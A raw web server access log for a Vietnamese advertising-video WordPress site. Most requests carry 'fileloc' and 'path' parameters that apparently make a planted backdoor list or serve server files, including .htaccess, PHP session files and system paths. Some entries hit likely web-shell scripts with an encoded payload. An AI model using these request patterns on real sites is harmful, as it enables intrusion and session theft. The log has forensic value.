216.73.216.50 - - [09/Nov/2025:00:50:12 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsys%2Fclass%2Fblock%2Floop1%2Fsubsystem%2Floop1%2Fsubsystem%2Floop1%2Fro&path=%2F%2Fsys%2Fclass%2Fblock%2Floop1%2Fsubsystem%2Floop1%2Fsubsystem%2Floop1 HTTP/1.0" 200 2861 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:00:50:13 +0000] "GET /q-~43AsI3gfFBgUeasMMUfxNLOJ5NNLojos618/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/.htaccess&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
114.119.132.10 - - [09/Nov/2025:00:50:15 +0000] "GET /q-~69FEaiYTwIioCaepLMEKQdHF1jimbAMs4698/ HTTP/1.0" 200 4759 "https://lamphimquangcao.net/sitemap546.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
3.89.176.255 - - [09/Nov/2025:00:50:16 +0000] "GET /our-works/phim-viral-ila/?fileloc=//etc/debian_version&path=//etc HTTP/1.0" 200 2826 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:50:16 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/memory7/subsystem/devices/memory4/subsystem HTTP/1.0" 200 3438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:50:18 +0000] "GET /95vii18585.html?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/xmlrpc.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4275 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
100.29.107.38 - - [09/Nov/2025:00:50:18 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//usr/bin/pathchk&path=//usr/bin HTTP/1.0" 200 2822 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:50:19 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory11/node0/memory6/subsystem/devices/memory3/power HTTP/1.0" 200 3584 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:50:19 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Fmisc%2Frfkill%2Fsubsystem%2Fkvm%2Fsubsystem%2Frfkill HTTP/1.0" 200 3355 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.248.20 - - [09/Nov/2025:00:48:00 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635323837392p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634393237392q3036393034336233393638623462363630613134663661353736636161373535222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
74.7.227.51 - - [09/Nov/2025:00:50:22 +0000] "GET /15emnl16255.html?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/click.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3819 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.223.181.32 - - [09/Nov/2025:00:50:22 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//usr/bin/pathchk&path=//usr/bin HTTP/1.0" 200 2822 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:50:22 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory12/node0/memory1/subsystem/devices/memory0/power HTTP/1.0" 200 3584 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
69.197.179.242 - - [09/Nov/2025:00:48:26 +0000] "GET /wp-includes/addc3d4c/edit.php?id=401440 HTTP/1.0" 200 166 "https://lamphimquangcao.net/wp-includes/addc3d4c/edit.php?id=401440" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
74.7.227.51 - - [09/Nov/2025:00:50:24 +0000] "GET /q-~27DdcxjPFwEnNmMY2PXAbAElmghVQBDr8784/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/.htaccess&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.2.4.213 - - [09/Nov/2025:00:50:25 +0000] "GET /our-works/tvc-relax-gaba/?path=//usr/share/publicsuffix HTTP/1.0" 200 3271 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:50:25 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory12/node0/memory1/subsystem/devices/memory1/subsystem/drivers HTTP/1.0" 200 2981 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:50:25 +0000] "GET /q-~27JWSwGOtUyvyCYmeavlg7ESGtKHgEuA4410/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/.htaccess&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:50:26 +0000] "GET /q-~11WQmEHwsKZGueeTXDkr0yBOyujXGCFt1060/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/.htaccess&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:50:28 +0000] "GET /21aitb40983.html?path=/var/www HTTP/1.0" 200 3947 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:50:28 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fthread-self%2Froot%2Fsys%2Fclass%2Finput%2Finput0%2Fsubsystem%2Fmouse0%2Fdevice%2Fsubsystem%2Fevent1%2Fpower HTTP/1.0" 200 3586 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:00:50:29 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory11/node0/memory6/subsystem/devices/memory3/subsystem/drivers HTTP/1.0" 200 2986 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.71.46.142 - - [09/Nov/2025:00:50:29 +0000] "GET /our-works/tvc-relax-gaba/?path=//usr/share/publicsuffix HTTP/1.0" 200 3271 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:50:30 +0000] "GET /q-~95EdYqdoTkXMlXJCZvcLFVCsw1YOQFIR2452/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/.htaccess&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.167.144.213 - - [09/Nov/2025:00:50:31 +0000] "GET /?products=1034330944 HTTP/1.0" 200 25897 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:50:32 +0000] "GET /8vpu680.html?fileloc=//bin/sg_raw&path=//bin HTTP/1.0" 200 2811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:50:33 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory11/node0/memory6/subsystem/devices/memory3/subsystem/devices HTTP/1.0" 200 3691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
98.82.40.168 - - [09/Nov/2025:00:50:33 +0000] "GET /our-works/tvc-calci/?path=//sys/module/shpchp HTTP/1.0" 200 3267 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:50:34 +0000] "GET /q-~62EdYqdoTkXMlXJCZvcLFVCsw1YOQFIR2485/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/.htaccess&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:50:35 +0000] "GET /103wgqp6495.html?path=/var/www HTTP/1.0" 200 3947 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:50:36 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/memory7/subsystem/devices/memory4/subsystem/drivers HTTP/1.0" 200 2987 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.225.199.17 - - [09/Nov/2025:00:50:36 +0000] "GET /our-works/tvc-calci/?path=//sys/module/shpchp HTTP/1.0" 200 3267 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:50:36 +0000] "GET /25bxri41697.html?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/wp-includes/class-wp-user-request.php&path=/var/www/lamphim/data/www/lamphimquangcao.net/wp-includes HTTP/1.0" 200 3509 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:50:37 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2F3264%2Froot%2Fsys%2Fmodule%2Fsysfillrect%2Fnotes%2F.note.gnu.build-id&path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2F3264%2Froot%2Fsys%2Fmodule%2Fsysfillrect%2Fnotes HTTP/1.0" 200 2911 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:00:50:38 +0000] "GET /25wdyz34271.html?path=/var/www HTTP/1.0" 200 3947 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:50:39 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory12/node0/memory1/subsystem/devices/memory0/subsystem HTTP/1.0" 200 3438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:50:39 +0000] "GET /92jhuf882.html HTTP/1.0" 200 4760 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.167.144.228 - - [09/Nov/2025:00:50:40 +0000] "GET /?products=871194982 HTTP/1.0" 200 28010 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
50.16.248.61 - - [09/Nov/2025:00:50:41 +0000] "GET /our-works/tvc-kimino/?fileloc=//usr/bin/lsattr&path=//usr/bin HTTP/1.0" 200 2822 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:50:42 +0000] "GET /4hocv4766.html HTTP/1.0" 200 4759 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:50:42 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/memory7/subsystem/devices/memory4/subsystem/devices HTTP/1.0" 200 3692 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [09/Nov/2025:00:48:23 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635323930322p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634393330322q6438653266323963386135343632323133653864623131306138623163303239222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
52.167.144.228 - - [09/Nov/2025:00:50:45 +0000] "GET /?products=1434634134 HTTP/1.0" 200 180 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:50:45 +0000] "GET /260czmcr2600.html?path=/var/www/lamphim/data/tmp HTTP/1.0" 200 5828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:50:45 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory12/node0/memory1/subsystem/devices/memory1/subsystem/devices HTTP/1.0" 200 3686 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.221.244.28 - - [09/Nov/2025:00:50:46 +0000] "GET /video/san-xuat-phim-quang-cao/?fileloc=//bin/keyring&path=//bin HTTP/1.0" 200 3029 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:00:50:49 +0000] "GET /our-works/tv-commercial/tvc-kimino?path=%2Fvar%2Fwww%2Flamphim%2Fdata%2Fwww%2Flamphimquangcao.net%2Fwp-includes%2Fblocks%2Fsocial-links HTTP/1.0" 200 3527 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:00:50:49 +0000] "GET /q-~43AsI3gfFBgUeasMMUfxNLOJ5NNLojos618/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/robots.txt&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 2942 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:50:49 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/memory7/subsystem/devices/memory4/power HTTP/1.0" 200 3584 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.221.227.90 - - [09/Nov/2025:00:50:50 +0000] "GET /video/san-xuat-phim-quang-cao/?fileloc=//bin/keyring&path=//bin HTTP/1.0" 200 3029 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:50:51 +0000] "GET /50fzmph21088.html?path=/var/www/lamphim/data/tmp HTTP/1.0" 200 5828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:50:51 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory11/node0/memory6/subsystem/devices/memory9/subsystem/devices/memory8 HTTP/1.0" 200 3665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.225.45.252 - - [09/Nov/2025:00:50:52 +0000] "GET /our-works/tvc-kimino/?fileloc=//bin/efibootdump&path=//bin HTTP/1.0" 200 2815 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:50:52 +0000] "GET /103wgqp6495.html?path=/var/www/maxdo_minawo_usr HTTP/1.0" 200 2890 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:50:54 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory11/node0/memory6/subsystem/devices/memory3/subsystem/devices/memory9 HTTP/1.0" 200 3665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:50:54 +0000] "GET /103wgqp6495.html?path=/var/www/villaflc_min_usr HTTP/1.0" 200 2891 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:50:55 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fsys%2Fclass%2Fblock%2Fsda%2Fsda1%2Fsubsystem%2Fsda%2Fsda1%2Fsubsystem%2Fsda%2Fdevice%2Fdriver HTTP/1.0" 200 3373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:00:50:55 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/memory7/subsystem/devices/memory9/subsystem/devices/memory3/power HTTP/1.0" 200 3636 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:50:58 +0000] "GET /126bdafd9126.html?path=/var/www/lamphim/data/tmp HTTP/1.0" 200 5828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
98.82.214.73 - - [09/Nov/2025:00:50:58 +0000] "GET /our-works/tvc-jokky/?fileloc=//usr/bin/byobu-select-session&path=//usr/bin HTTP/1.0" 200 3387 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:50:59 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory12/node0/memory1/subsystem/devices/memory0/subsystem/drivers HTTP/1.0" 200 2986 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:51:01 +0000] "GET /104jdrww1044.html?path=/var/www/lamphim/data/tmp HTTP/1.0" 200 5828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:51:02 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Finclude%2Fconfig%2Funix.h&path=%2F%2Fusr%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Finclude%2Fconfig HTTP/1.0" 200 2877 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.5.232.250 - - [09/Nov/2025:00:51:03 +0000] "GET /our-works/tvc-relax-gaba/?path=//usr/lib/openssh HTTP/1.0" 200 3401 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:51:03 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory12/node0/memory1/subsystem/devices/memory0/subsystem/devices HTTP/1.0" 200 3691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:51:04 +0000] "GET /25wdyz34271.html?path=/var/www/villaflc_min_usr HTTP/1.0" 200 2891 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.196.6.199 - - [09/Nov/2025:00:51:06 +0000] "GET /our-works/tvc-jokky/?path=//proc/9/net HTTP/1.0" 200 4686 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:51:07 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/memory7/subsystem/devices/memory4/subsystem/devices/memory8 HTTP/1.0" 200 3665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:51:07 +0000] "GET /260czmcr2600.html?fileloc=/var/www/lamphim/data/tmp/sess_vmnl2faut262c48tdsbrbdu7mm&path=/var/www/lamphim/data/tmp HTTP/1.0" 200 2887 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [09/Nov/2025:00:48:47 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635323932352p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634393332352q3466323236313261396437613862386331323833313265376333393063336235222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
52.54.95.127 - - [09/Nov/2025:00:51:09 +0000] "GET /our-works/tvc-kimino/?fileloc=//usr/bin/run-one&path=//usr/bin HTTP/1.0" 200 4489 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:51:10 +0000] "GET /260czmcr2600.html?fileloc=/var/www/lamphim/data/tmp/sess_a2gm4u45atq48be5n4b73gk837&path=/var/www/lamphim/data/tmp HTTP/1.0" 200 2889 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:51:10 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/memory7/subsystem/devices/memory4/subsystem/devices/memory9 HTTP/1.0" 200 3665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:51:12 +0000] "GET /260czmcr2600.html?fileloc=/var/www/lamphim/data/tmp/sess_m4nkf01g30jgqmjgavkkqfgsds&path=/var/www/lamphim/data/tmp HTTP/1.0" 200 2935 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:51:12 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory11/node0/memory6/subsystem/devices/memory9/subsystem/devices/memory7 HTTP/1.0" 200 3665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
35.168.238.50 - - [09/Nov/2025:00:51:13 +0000] "GET /our-works/tvc-jokky/?fileloc=//usr/bin/fincore&path=//usr/bin HTTP/1.0" 200 2822 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:51:13 +0000] "GET /126bdafd9126.html?fileloc=/var/www/lamphim/data/tmp/sess_luq4ps60h5sogrb0jo94kinov2&path=/var/www/lamphim/data/tmp HTTP/1.0" 200 2889 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:51:14 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/memory7/subsystem/devices/memory8/subsystem/devices/memory6 HTTP/1.0" 200 3665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:51:14 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Fsbin%2Fmkinitramfs&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Fsbin HTTP/1.0" 200 7384 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:00:51:15 +0000] "GET /92jhuf882.html?path=/ HTTP/1.0" 200 3782 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
